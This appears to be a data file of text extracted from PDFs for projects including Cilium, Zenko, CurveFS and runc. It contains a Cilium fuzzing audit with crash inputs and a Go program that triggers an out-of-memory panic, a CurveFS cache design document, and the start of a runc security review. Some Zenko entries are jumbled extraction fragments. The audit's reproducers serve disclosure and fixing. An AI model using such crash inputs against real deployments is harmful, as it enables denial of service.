\n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:65 \ngithub.com/cilium/cilium/pkg/monitor/payload.TestPOC(0x0?) \n/tmp/cilium/pkg/monitor/payload/pl_test.go:10 +0xad\nFigure 2.3: Stacktrace from running the test case against the Cilium code base.\nThis issue has been closed without a fix for the same reasons as ADA-CIL-FUZZ-1.\n12Cilium Fuzzing Audit, 2022\n3: Cilium Monitor: Out of memory panic\nOSS-Fuzz bug tracker\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53070\nMitigation\nClose: WontFix\nID:\nADA-CIL-FUZZ-3\nDescription\nFuzzFormatEvent found a crash when a well-crafted Payload would be passed to(m*MonitorFormatter).FormatEvent()\n.\nThe vulnerable payload json was:{\"Data\":\"gvsB/yAgIA==\",\"CPU\":32,\"Lost\":32,\"Type\":9}\nOSS-Fuzz took the following steps to trigger the crash. Note that this happened inside the\nOSS-Fuzz environment which has a maximum of 2560Mb memory available:\n1234567891011121314151617packagemain\nimport(\"github.com/cilium/cilium/pkg/monitor/format\"\"github.com/cilium/cilium/pkg/monitor/payload\")\nfuncmain() {pl := &payload.Payload{Data: []byte(\"gvsB/yAgIA==\"),CPU:32,Lost:uint64(32),Type:9,}mf := format.NewMonitorFormatter(0,nil)mf.FormatEvent(pl)}\nFigure 3.0: Sample program that triggered the out-of-memory issue,inside the OSS-Fuzz environment\n… which resulted in allocating 3797Mb of memory that OSS-Fuzz reported as an\nout-of-memory issue:\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n==13== ERROR: libFuzzer: out-of-memory (used: 3797Mb; limit: 2560Mb) \nTo change the out-of-memory limit use -rss_limit_mb=<N>\nLive Heap Allocations: 24131934 bytes in 41 chunks; quarantined: 142310 bytes in 56 chunks; 9911 other chunks; total \nchunks: 10008; showing top 95% (at most 8 unique contexts) \n24120824 byte(s) (99%) in 9 allocation(s) \n#0 0x52efb6 in __interceptor_malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3 \n#1 0x4ad9b7 in operator new(unsigned long) cxa_noexception.cpp \n#2 0x458362 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 \n#3 0x7f92b5028082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: \n1878e6b475720c7c51969e69ab2d276fae6d1dee)\nFigure 3.1: Stack trace reported by OSS-Fuzz\nThis issue has been closed without a fix for the same reasons as ADA-CIL-FUZZ-1 and\nADA-CIL-FUZZ-2.\n13Cilium Fuzzing Audit, 2022\n4: Excessive processing time required for rules with long DNS\nnames\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49019\nMitigation:\nImprove Cilium limits on matchpattern\nID:\nADA-CIL-FUZZ-4\nDescription\nA fuzzer found that a well-crafted payload passed togithub.com/cilium/cilium/pkg/fqdn/matchpattern.ValidateWithoutCache()\nwould\ncause Cilium to spend excessive time on a single process. The issue was reported by\nOSS-Fuzz as a time-out from spending 61 seconds on a single invocation ofValidateWithoutCache()\n.\nThe time-out happens when Cilium passes the testcase ontoregexp.Compile(TESTCASE)\n.\nCilium does this without checking the length of the input, and a long input string can make\nCilium spend excessive time on a single invocation. To trigger the crash, the fuzzer had\ngenerated a string longer than 70,000 bytes.\nThe issue was triaged by the Cilium team, and an issue has been opened here:\nhttps://github.com/cilium/cilium/issues/21491\nThe input t o this function is first submitted t o the K ubernetes apiser ver and st ored in a Cust om\nResour ce field. This r equir es a high le vel of privileges t o inser t. 
Furthermor e, Kubernetes typically\nimposes v arious limits on such fields and on the siz e of the entir e resour ce objects, so it is\npossible that it is r ejected befor e it r eaches this point. K ubernetes will only then for ward the\nobject t o Cilium for Cilium t o then pr ocess this object with the code being fuzz ed in this scenario.\nDue t o these mitigating fact ors, the Cilium maintainers do not consider this t o be lik ely to occur\nin a r eal user envir onment. That said, impr ovements can be made in the Cilium tr ee which is why\nthe abo ve Github issue has been cr eated.\n14Cilium Fuzzing Audit, 2022\n5: Excessive memory allocation when parsing MetalLB\nconfiguration\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n1786\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3059\nMitigation\nDeprecate feature\nID:\nADA-CIL-FUZZ-5\nDescription\nA fuzzer that tests the 3rd-party metallb config parser found that it is possible to cause\nexcessive memory consumption of the host machine if a well-crafted config file was being\nparsed.\nThe parsing routine failed at 2 different places, one in Cilium itself and one in the 3rd-party\nlibrary handling the parsing.\nThe found issues have prompted a discussion around deprecating MetalLB support instead\nof fixing the issue in the 3rd-party dependency itself:\nhttps://github.com/cilium/cilium/issues/22246\n15Cilium Fuzzing Audit, 2022\n6: Excessive memory usage when loading and writing ELF file\nOSS-Fuzz bug tracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n1731\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n2981\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3015\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5\n3066\nMitigation:\nAvoid reading/writing ELFs as part of datapath load\nID:\nADA-CIL-FUZZ-6\nDescription\nA fuzzer that Ciliums reading and writing routines of ELF files could trigger both an\nout-of-memory panics as well as a time-out from excessive processing time on a single elf\nfile. The root cause is an issue in Golang which is well known to the Golang maintainers. In\nGolang, it is not considered a security vulnerability issue in Golang itself due to the intended\nusage of theelf\npackage.\nTo trigger the issue, the fuzzer creates a file containing the test case. It then invokesgithub.com/cilium/cilium/pkg/elf.Open()\nwith the path\nto the created file.Open()\nreads the file and passes the file contents ontogithub.com/cilium/cilium/pkg/elf.NewELF()\nwhich passes\nthe file contents ontodebug/elf.NewFile()\nin the standard library where\nthe crash happens.\nCilium issue:\nhttps://github.com/cilium/cilium/issues/22245\nSignificant local privileges are required to invoke this bug, so this is not considered a security\nconcern by the Cilium core team. The Cilium maintainers have longer term plans to remove\nthis code, and this will be addressed as part of that effort.\n16Cilium Fuzzing Audit, 2022\n7: Excessive memory consumption when reading bytes of\nbpf_elf_map\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48961\nMitigation\nAvoid reading/writing ELFs as part of datapath load\nID:\nADA-CIL-FUZZ-7\nDescription\ngithub.com/cilium/cilium/pkg/bpf.parseExtra()\nparses\nextra bytes from the end of abpf_elf_map\nstruct. 
A fuzzer was able to invoke this\nmethod by callingStartBPFFSMigration\nandFinalizeBPFFSMigration\n.\nThe issue was fixed by removing theparseExtra()\napi\naltogether:\nhttps://github.com/cilium/cilium/pull/19159\n.\n17Cilium Fuzzing Audit, 2022\n8: Hubble: nil-dereference in three-four parser\nOSS-Fuzz bug tracker\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48960\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=\n48957\nMitigation\nCheck if nil before reading\nID:\nADA-CIL-FUZZ-8\nDescription\nTwo nil-dereference panics were discovered in the Hubble three-four parser when accessing a field\nof(*Parser).linkGetter\n. At the time of occurrence,\nthe crash would not be triggerable\nthrough any existing code paths of Ciliums and was considered a cosmetic change. The fuzzer\ncreated the parser through Ciliums own constructor and passed\nnil\nfor all getters.\ncilium/pkg/monitor/datapath_debug.go\n254255\n256257caseDbgEncap:returnfmt.Sprintf(\"Encapsulating to node %d (%#x)from seclabel %d\",n.Arg1, n.Arg1, n.Arg2)caseDbgLxcFound:ifname := linkMonitor.Name(n.Arg1)\nFigure 8.1:Point of failure of ADA-CIL-Fuzz-8\ncilium/pkg/monitor/datapath_debug.go\n664665666667668669returnnil}\n// if the interface is not found, `name` will be an empty string and thus// omitted in the protobuf messagename, _ := p.linkGetter.GetIfNameCached(int(ifIndex))\nFigure 8.2:Point of failure of ADA-CIL-Fuzz-8\nFix:\nhttps://github.com/cilium/cilium/pull/20446\n18Cilium Fuzzing Audit, 2022\nRuntime stats\nContinuity is an important element in fuzzing because fuzzers incrementally build up a\ncorpus over time, therefore, the size of the corpus is a reflection of how much code the\nfuzzer has explored. OSS-Fuzz prioritises running fuzzers that continue to explore more\ncode, and the CPU time presented by OSS-Fuzz runtime stats is thus a reflection of how\nmuch work the fuzzers have performed. The following tables lists for each fuzzer\n3\nthe\namounts of tests executed as well as the total CPU hours devoted:\nName\nTotal times executed\nTotal runtime (hours)\nFuzzLabelsfilterPkg280,380,1081,332.7\nFuzzDecodeTraceNotify69,256,225,2594,816.5\nFuzzFormatEvent63,743,550129\nFuzzPayloadEncodeDecode1,689,825245.2\nFuzzElfOpen72,033,696224.2\nFuzzElfWrite28,824,726135\nFuzzMatchpatternValidate9,814,975,4565,146\nFuzzMatchpatternValidateWithoutCache1,250,359,4777,492\nFuzzParserDecode59,149,192,0956,927.5\nFuzzLabelsParse2,607,448,95513,693.5\nFuzzMultipleParsers74,5246.9\nFuzzConfigParse1,194,473,6236,805.3\nFuzzNewVisibilityPolicy8,817,227,3903,379.4\nFuzzBpf205,251,06912.8\n3\nAs per 6th December 2022.\n19Cilium Fuzzing Audit, 2022\nConclusions and future work\nThis fuzzing audit added 14 fuzzers to the Cilium projects. A total of 8 issues were found\nand at the time of this writing 5 of these issues have been fixed where 3 of the issues are\ndeclared WontFix. The fuzzers were added to Ciliums OSS-Fuzz integration, so that they\ncontinue to test Cilium for hard-to-find bugs as well as new code. 
OSS-Fuzz will\nperiodically pull the latest master of Cilium and run the fuzzers against that version of the\nsource tree.\nAs this fuzzing audit concludes, it is important to highlight that fuzzing is a continuous\neffort and that the fuzzers should continue to run through Cilium's OSS-Fuzz integration.\nSome bugs may take a long time to find, and the fuzzers need sustained runtime to get deep into the code\nbase, so it is imperative that the fuzzers keep running for that purpose.\nFor future work we recommend the following activities to the Cilium team:\nImprove Cilium's testability:\nIt may happen that some fuzzers find false positives that\ntheoretically are bugs but cannot be triggered via any execution path into the part of the code\nwhere the crash occurs. This was the case with issue #8 of this fuzzing audit, which sparked a\ndiscussion about what to do in these cases for Cilium. An excellent point was made by\nCilium maintainer Joe Stringer, who argued that false positives may be a sign that Cilium\nshould improve its testability:\nhttps://github.com/cilium/cilium/pull/20446#discussion_r919120926\nThis is a great observation that also highlights the importance of continuity in fuzzing; some crashes\nrequired multiple development iterations of both the fuzzers and the code base itself in order\nto fully utilize the capabilities of fuzzing, and continuously improving both sides is\nimportant.\nImprove coverage:\nWe recommend making it a continuous effort to identify missing test\ncoverage of the fuzzers. This can be done using the code coverage visualisations provided\nby OSS-Fuzz.\nRequire fuzzers for new code:\nThe Cilium community does a good job in adding unit tests\nto new code contributions, and we recommend that Cilium makes a policy out of adding\nfuzzers in addition to unit tests. The overhead of writing fuzzers in addition to unit tests in\nGo is low, since Go has its own fuzzing engine that makes writing unit tests and fuzzers a\nsimilar experience:\nhttps://go.dev/security/fuzz/" } ]
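The "Require fuzzers for new code" recommendation above refers to Go's native fuzzing engine (go.dev/security/fuzz). The following is a minimal sketch of that workflow, not Cilium code: parsePeers is a hypothetical stand-in target, and the test would live in a *_test.go file and run with `go test -fuzz=FuzzParsePeers`.

```go
package fuzzdemo

import (
	"encoding/json"
	"testing"
)

// parsePeers is a stand-in for whatever parser a new contribution adds;
// it is not Cilium code, just a self-contained example target.
func parsePeers(data []byte) ([]string, error) {
	var cfg struct {
		Peers []string `json:"peers"`
	}
	if err := json.Unmarshal(data, &cfg); err != nil {
		return nil, err
	}
	return cfg.Peers, nil
}

// FuzzParsePeers shows the shape of a native Go fuzz test: seed inputs go in
// via f.Add, and the engine mutates them looking for panics or failed checks.
func FuzzParsePeers(f *testing.F) {
	f.Add([]byte(`{"peers": ["a", "b"]}`)) // seed corpus entry
	f.Fuzz(func(t *testing.T, data []byte) {
		peers, err := parsePeers(data)
		if err != nil {
			return // rejecting malformed input is fine; only panics/invariant breaks matter
		}
		// A cheap invariant: every parsed peer needs at least two input bytes,
		// so the count can never exceed the input length.
		if len(peers) > len(data) {
			t.Fatalf("parsed %d peers from %d input bytes", len(peers), len(data))
		}
	})
}
```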
{ "category": "Runtime", "file_name": "XDM_arch_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUICloudServer/\nBlobserverAWS\nGCP\nAzureS3C/RINGXDM\nClientBucket & Object \nNamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLI" } ]
{ "category": "Runtime", "file_name": "XDM_hi-level.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUI\nCLIXDMAWS\nGCP\nAzureRING\nGCP XML APIS3 API\nAzure Storage APIS3 API\nS3 API" } ]
{ "category": "Runtime", "file_name": "Curve支持S3数据缓存方案.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 11Curve支持S3 数据缓存方案© XXX Page 2 of 11版本时间 修改者 修改内容\n1.02021/8/18 胡遥 初稿\n2.02022/8/4 胡遥 根据当前代码实现进行文档更新\n背景\n整体设计\n缓存设计\n文件到s3对象映射\n元数据采用2层索引\n对象名设计\n读写缓存分离\n对外接口\n后台刷数据线程\n本地磁盘缓存\n关键数据结构\n详细设计\nWrite流程\nRead流程\nReleaseCache流程\nFlush流程\nFsSync流程\n后台流程\n背景\n基于s3的daemon版本基于基本的性能测试发现性能非常差。具体数据如下:\n通过日志初步分析有2点原因© XXX Page 3 of 11\n1.append接口目前采用先从s3 get,在内存中合并完后再put的方式,对s3操作过多\n2.对于4k 小io每次都要和s3交互,导致性能非常差。\n因此需要通过Cache模块解决以上2个问题。\n整体设计\n整个dataCache的设计思路包括:\n1.为了快速查询到对应的缓存,整个缓存分为3层file->chunk->datacache。\n2.整个文件到s3对象的映射分为4层,file->chunk->datacach->block。\n3.文件对应s3元数据采用2层索引。\n缓存设计\n从上面的整体架构图来看,整个缓存分为3层,file->chunk->datacache 3层,通过inodeId找到file,通过offset计算出chunkindex找到chunk,然后通过offset~len找到是否有合适的datacache或者new© XXX Page 4 of 11datacache。\n这里FileCacheManager,ChunkCacheManager维护的缓存主要都是一张map表,只有真正到了dataCache这一层才涉及到真正的数据。\n这里对chunk,block的概念在详细说明一下,当文件系统创建的时候会指定chunkSize,blockSize,这个时候chunk和block的大小就固定了,不可修改。因此一个文件的chunk和block也是固定的,任意一个offset\n的访问都可以通过这2个值计算到属于那个chunk,以及chunk内属于哪个block。注意这里block不是全局的index,而是chunk内的index(好像用全局的blockindex也是没问题的)\n早期的datacache设计的是连续的内存,但是连续的内存在多个dataCache的合并上会有大内存的申请和释放,耗时较大。目前已经采用page的方式存储在datacache中,每个page是64k,这样在datacache合并的时\n候只需要分配少量的内存,或者是对page的迁移就能达到合并的效果。所以datacache逻辑上是对应一段连续的file data,但是在内存中实际上是由许多不连续的page组成。\n文件到s3对象映射\n整个文件到s3对象的映射分为4层:file,chunk,datacache,block。file是由固定大小的chunk组成,chunk是由变长且连续的datacache组成,datacache是由固定大小的block组成。所有datacache(这里指的是\n写datacache)没有交集(因为如果有,在write流程中就合并了,没有合并的必然是没有交集的)。\n在datacache flush的流程中,将数据写到s3上。考虑到datacache是连续的变长数据,而我们写到s3上是固定大小的对象,所以引入了block的概念。因此会根据datacache对应的chunk的便宜pos,计算block\nindex,从而构成对象名,写到s3上。\n元数据采用2层索引\n由于chunk大小是固定的(默认64M),所以Inode中采用map<uint64, S3ChunkInfoList>\ns3ChunkInfoMap用于保存对象存储的位置信息。采用2级索引的好处是,根据操作的offset可以快速定位到index,则只需要遍历index相关的S3ChunkInfoList,减少了遍历的范围。\n对象名设计\n对象名采用fsid+inodeId+chunkId+blockindex+compaction(后台碎片整理才会使用,默认0)+inodeId。增加inodeId的目的是为了后续从对象存储上遍历,反查文件,这里就要求inodeId是永远不可重复。\n读写缓存分离© XXX Page 5 of 11读写缓存的设计采用的是读写缓存分离的方案。写缓存一旦flush即释放,读缓存采用可设置的策略进行淘汰(默认LRU),对于小io进行block级别的预读。这里读缓存的产生会有2种场景,第1是用户读请求s3产\n生的数据会加入到读缓存中,第2是写flush后的datacache会转化为读缓存。这里有一种情况,读缓存在新增datacache的时候,可能和老的读缓存会有重叠的部分,这种情况肯定是以新加入的读缓存为主,将老的\n读缓存删除掉\n对外接口\n流程上对于读写缓存有影响的接口包括:Write,Read,ReleaseCache,Flush,Fssync,Truncate,增对cto场景又增加了FlushAllCache。后面会详细介绍这些接口流程。\n后台刷数据线程\n启动后台线程,将写Cache定时刷到S3上,同时通过inodeManager更新inode缓存中的s3InfoList。具体细节见\n本地磁盘缓存\n如果有配置writeBack dev,则会调用diskStroage进行本地磁盘write,最终写到s3则由diskStroage模块决定。\n关键数据结构\nmessage S3ChunkInfo {\n required uint64 chunkId = 1;\n required uint64 compaction = 2;\n required uint64 offset = 3;\n required uint64 len = 4; // file logic length\n required uint64 size = 5; // file size in object storage\n required uint64 zero = 6;\n};\nmessage Inode {\n required uint64 inodeId = 1;\n required uint32 fsId = 2;\n required uint64 length = 3;\n required uint32 ctime = 4;\n required uint32 mtime = 5;\n required uint32 atime = 6;\n required uint32 uid = 7;\n required uint32 gid = 8;\n required uint32 mode = 9;\n required sint32 nlink = 10;\n required FsFileType type = 11;\n optional string symlink = 12; // TYPE_SYM_LINK only© XXX Page 6 of 11 optional VolumeExtentList volumeExtentList = 13; // TYPE_FILE only\n map<uint64, S3ChunkInfoList> s3ChunkInfoMap = 14; // TYPE_S3 only, first is chunk index\n optional uint64 version = 15;\n}\nclass ClientS3Adaptor {\n public:\n ClientS3Adaptor () {}\n void Init(const S3ClientAdaptorOption option, S3Client *client,\n std::shared_ptr inodeManager);\n int Write(Inode *inode, uint64_t offset,\n uint64_t length, const char* buf bool di);\n int 
Read(Inode *inode, uint64_t offset,\n             uint64_t length, char* buf);\n    int ReleaseCache(uint64_t inodeId);\n    int Flush(Inode *inode);\n    int FsSync();\n    uint64_t GetBlockSize() { return blockSize_; }\n    uint64_t GetChunkSize() { return chunkSize_; }\n    CURVEFS_ERROR AllocS3ChunkId(uint32_t fsId);\n    CURVEFS_ERROR GetInode(uint64_t inodeId, Inode *out);\n private:\n    S3Client *client_;\n    uint64_t blockSize_;\n    uint64_t chunkSize_;\n    std::string metaServerEps_;\n    std::string allocateServerEps_;\n    Thread bgFlushThread_;\n    std::atomic toStop_;\n    std::shared_ptr fsCacheManager_;\n    std::shared_ptr inodeManager_;\n};\nclass S3ClientAdaptor;\nclass ChunkCacheManager;\nclass FileCacheManager;\nclass FsCacheManager;\nusing FileCacheManagerPtr = std::shared_ptr<FileCacheManager>;\nusing ChunkCacheManagerPtr = std::shared_ptr<ChunkCacheManager>;\nusing DataCachePtr = std::shared_ptr<DataCache>;\nclass FsCacheManager {\n public:\n    FsCacheManager() {}\n    FileCacheManagerPtr FindFileCacheManager(uint32_t fsId, uint64_t inodeId);\n    void ReleaseFileCahcheManager(uint32_t fdId, uint64_t inodeId);\n    FileCacheManagerPtr GetNextFileCacheManager();\n    void InitMapIter();\n    bool FsCacheManagerIsEmpty();\n private:\n    std::unordered_map fileCacheManagerMap_; // first is inodeid\n    std::unordered_map ::iterator fileCacheManagerMapIter_;\n    RWLock rwLock_;\n    std::list lruReadDataCacheList;\n    uint64_t lruMaxSize;\n    std::atomic dataCacheNum_;\n};\nclass FileCacheManager {\n public:\n    FileCacheManager(uint32_t fsid, uint64_t inode) : fsId_(fsid), inode_(inode) {}\n    ChunkCacheManagerPtr FindChunkCacheManager(uint64_t index);\n    void ReleaseChunkCacheManager(uint64_t index);\n    void ReleaseCache();\n    CURVEFS_ERROR Flush();\n private:\n    uint64_t fsId_;\n    uint64_t inode_;\n    std::map chunkCacheMap_; // first is index\n    RWLock rwLock_;\n};\nclass ChunkCacheManager {\n public:\n    ChunkCacheManager(uint64_t index) : index_(index) {}\n    DataCachePtr NewDataCache(S3ClientAdaptor *s3ClientAdaptor, uint32_t chunkPos, uint32_t len, const char *data, CacheType type);\n    DataCachePtr FindWriteableDataCache(uint32_t pos, uint32_t len);\n    CURVEFS_ERROR Flush();\n private:\n    uint64_t index_;\n    std::map dataWCacheMap_; // first is pos in chunk\n    curve::common::Mutex wMtx_;\n    std::map dataRCacheMap_; // first is pos in chunk\n};\nclass DataCache {\n public:\n    DataCache(S3ClientAdaptor *s3ClientAdaptor, ChunkCacheManager* chunkCacheManager, uint32_t chunkPos, uint32_t len, const char *data)\n        : s3ClientAdaptor_(s3ClientAdaptor), chunkCacheManager_(chunkCacheManager), chunkPos_(chunkPos), len_(len) {\n        data_ = new char[len];\n        memcpy(data_, data, len);\n    }\n    virtual ~DataCache() {\n        delete[] data_;\n        data_ = NULL;\n    }\n    void Write(uint32_t cachePos, uint32_t len, const char* data);\n    CURVEFS_ERROR Flush();\n private:\n    S3ClientAdaptor *s3ClientAdaptor_;\n    ChunkCacheManager* chunkCacheManager_;\n    uint64_t chunkId;\n    uint32_t chunkPos_;\n    uint32_t len_;\n    char* data_;\n};\nDetailed design\nWrite flow\n1. Flow control: if the write cache already used by the file system has reached the watermark, the request waits first. It is woken up and continues after a flush releases cache.\n2. Take the write lock, find the corresponding fileCacheManager by inode and fsid (create a new fileCacheManager if there is none), release the lock, and call the fileCacheManager's Write function.\n3. Compute the corresponding chunk index and chunkPos from the request offset. Split the request into WriteChunk calls on multiple chunks.\n4. Inside WriteChunk, find the corresponding ChunkCacheManager by index, take the ChunkCacheManager lock, and look for a writable DataCache in the dataCacheMap based on the request's chunkPos and len:\n4.1 A DataCache is writable if the chunkPos~len range intersects it (including the case where they just touch at the boundary).\n4.2 At the same time, check whether the following DataCaches also intersect chunkPos~len; if so, take them all.\n5. 
If there is a writable DataCache, call its Write interface to merge the data into that DataCache; if there is no writable DataCache, create (new) one and add it to the ChunkCacheManager's map.\n6. Release the ChunkCacheManager lock and return success.\nRead flow\n1. Compute the corresponding chunk index and chunkPos from the request offset. Split the request into ReadChunk calls on multiple chunks.\n2. Inside ReadChunk, find the corresponding ChunkCacheManager by index, take the ChunkCacheManager read lock, and look for a readable DataCache in the dataCacheMap based on the request's chunkPos and len.\n2.1 Because of the read/write cache separation, a chunkCacheManager actually holds 3 kinds of datacache at this point: write datacaches, flushing datacaches, and read datacaches. In terms of how they are produced, a write datacache always holds the newest data, then a flushing datacache, then a read datacache. The lookup order for the user's offset~len is therefore: write datacaches first, then flushing datacaches, then read datacaches.\n2.2 The lookup result falls into 3 cases: the chunkPos~len range to read is fully cached, partially cached, or not cached at all. The cached part is copied directly into the corresponding offset of the interface's buf pointer; the uncached part produces a requestVer.\n3. Traverse requestVer, use each request's offset to find the S3ChunkInfoList of the corresponding index in the inode, build an s3Request from the S3ChunkInfoList, and finally produce an s3RequestVer. This is mainly implemented in GenerateS3Request.\n3.1 A retry mechanism has been added here: in general, if the read from S3 fails because the object does not exist, it keeps retrying; there are 2 cases here.\n4. Traverse the requests in s3RequestVer and read the data using asynchronous interfaces.\n5. Wait for all requests to return, update the read cache, and fill readBuf with the returned data.\nReleaseCache flow\n1. Since deletion is asynchronous, a delete operation only needs to release the client's cache. One guarantee required here is that the upper layer ensures the file is not open before calling this interface, so there is no need to consider the cache being added to or modified while it is being deleted.\n2. Find the corresponding FileCacheManager by inodeId and call the ReleaseCache interface to release the caches level by level.\nFlush flow\n1. Find the corresponding FileCacheManager by inodeId and execute its Flush function.\n2. FileCacheManager::Flush processing: take the write lock, copy the FileCacheManager's chunkCacheMap_ into a temporary variable tmp, and release the write lock. The flush of the chunkCacheManagers has been optimized to be concurrent and asynchronous: traverse the ChunkCacheManager list in tmp, wrap each chunkCacheManager into a FlushChunkCacheContext in a task array, and let a thread pool process the flushes of the different chunkCacheManagers concurrently.\n3. ChunkCacheManager::Flush processing:\n3.1 Take one datacache from the write datacaches, assign it to flushingDataCache, and remove it from the write datacache map (previously it was not removed, but then a datacache that was already being flushed could merge new data, which led to too much duplicate data on S3).\n3.2 Execute the flush of flushingDataCache. On success the datacache is converted into a read cache, and ReleaseWriteDataCache is called to update the write cache counters. On failure there are 2 cases: if the S3 write failed, keep retrying with backoff; if the inode cannot be obtained because it no longer exists, the file has been deleted and the related write cache is released directly.\n4. dataCache::Flush flow:\n4.1 Obtain a globally increasing chunkid from the MDS to associate with this datacache; a larger chunkid means the data of the corresponding object is newer.\n4.2 Write to S3 or the disk cache asynchronously.\n4.3 Update the corresponding s3info and add it to the inode's s3infoList.\nFsSync flow\n1. Iterate over the FileCacheManagers and execute their Flush functions.\nBackground flow\n1. A DataCacheNum_ field is added to FsCacheManager. If it is 0, no cache needs to be flushed and the thread waits on a condition variable.\n2. The Write flow notifies and wakes up the background thread when it is in the wait state, and updates DataCacheNum_ at the same time.\n3. The background thread executes FsCacheManager::FsSync, which ultimately calls FileCacheManager::Flush, consistent with the Flush flow." } ]
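Both the Write and Read flows above begin by splitting the byte range [offset, offset+length) into per-chunk sub-requests using the fixed chunkSize. The following is a minimal Go sketch of that index/position arithmetic only, with illustrative names rather than the CurveFS C++ types:

```go
package main

import "fmt"

// subRequest describes the portion of a user request that falls into one chunk.
type subRequest struct {
	chunkIndex uint64 // which chunk of the file
	chunkPos   uint64 // offset inside that chunk
	bufOff     uint64 // offset inside the caller's buffer
	length     uint64 // bytes to read/write in this chunk
}

// splitByChunk splits [offset, offset+length) into chunk-aligned pieces,
// mirroring the "compute chunk index and chunkPos, then issue one
// WriteChunk/ReadChunk call per chunk" step described above.
func splitByChunk(offset, length, chunkSize uint64) []subRequest {
	var out []subRequest
	for done := uint64(0); done < length; {
		cur := offset + done
		index := cur / chunkSize
		pos := cur % chunkSize
		n := chunkSize - pos // room left in this chunk
		if rest := length - done; rest < n {
			n = rest
		}
		out = append(out, subRequest{chunkIndex: index, chunkPos: pos, bufOff: done, length: n})
		done += n
	}
	return out
}

func main() {
	// 64 MiB chunks, a 5 MiB request that straddles a chunk boundary.
	const chunkSize = 64 << 20
	for _, r := range splitByChunk(chunkSize-2<<20, 5<<20, chunkSize) {
		fmt.Printf("chunk %d: pos=%d len=%d (buffer offset %d)\n", r.chunkIndex, r.chunkPos, r.length, r.bufOff)
	}
}
```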
{ "category": "Runtime", "file_name": "Security-Audit.pdf", "project_name": "runc", "subcategory": "Container Runtime" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity-Review Report runc 11.-12.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, N. Hippert, J. Larsson,\nMSc. D. Weißer, MSc. N. Krein, MSc. F. Fäßler\nIndex\nIntroduction\nScope\nTest Methodology\nPhase 1: General security posture checks\nPhase 2: Manual code auditing\nPhase 1: General security posture checks\nApplication/Service/Project Specifics\nLanguage Specifics\nExternal Libraries & Frameworks\nConfiguration Concerns\nAccess Control\nLogging/Monitoring\nUnit/Regression Testing\nDocumentation\nOrganization/Team/Infrastructure Specifics\nSecurity Contact\nSecurity Fix Handling\nBug Bounty\nBug Tracking & Review Process\nEvaluating the Overall Posture\nPhase 2: Manual code auditing & pentesting\nMounting/Binding and Symlinks\nIdentified Vulnerabilities\nRUN-01-001 Race-condition bypassing masked paths (High)\nConclusions & Verdict\nCure53, Berlin · 12/06/19 1/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIntroduction\n“runc is a CLI tool for spawning and running containers according to the OCI\nspecification.” \nFrom https://github.com/opencontainers/runc\nThis report describes the results of a security assessment and a review of the general\nsecurity posture found on the runc software complex and its surroundings. The project\nwas requested and sponsored by CNCF as a common part of the CNCF project\ngraduation process. Within the frames of well-established cooperation, the project was\nawarded to Cure53, which investigated the runc scope in terms of security processes,\nresponse and infrastructure.\nThe work was carried out by seven members of the Cure53 team in November and\nDecember 2019, with a total budget standing at eighteen person-days. From the star,\nthe work was split into two different phases, with Phase 1 focused on General security\nposture checks and Phase 2 dedicated to Manual code auditing aimed at finding\nimplementation-related issues that can lead to security bugs. Cure53 worked in close\ncollaboration with the runc team and the communications during the engagement took\nplace in a dedicated channel of the Docker Slack workspace. The Cure53 team was\ninvited to join the exchanges in that channel by the maintainers. In general,\ncommunications were productive, yet the scope was very clear and not many questions\nhad to be asked.\nBy coincidence, Cure53 received information about a possible race condition\nvulnerability present in the runc codebase at the time when this assessment was in\nprogress. This unusual opportunity was used to first analyze the alleged issue and\ncreate a working PoC. Secondly, it served as a specific case of a bug initially found by a\nthird-party, giving Cure53 a front-row seat to observing and evaluating the disclosure\nprocess. Perspectives of the original finder and the reaction of the runc team upon\ngetting access to the bug report could be investigated and, thanks to this real-life\nexample of an actual vulnerability spotted by a third party, Cure53 gathered empirical\nevidence on optimizing the process at the runc entities in the future.\nIn the following sections, the report will first present the areas featured in the test’s\nscope in more detail, zooming in on the proposed structure of the two phases delineated\nabove. The report is enriched by Cure53 describing the evaluated areas and explaining\nthe methodology of the executed tests in more detail. 
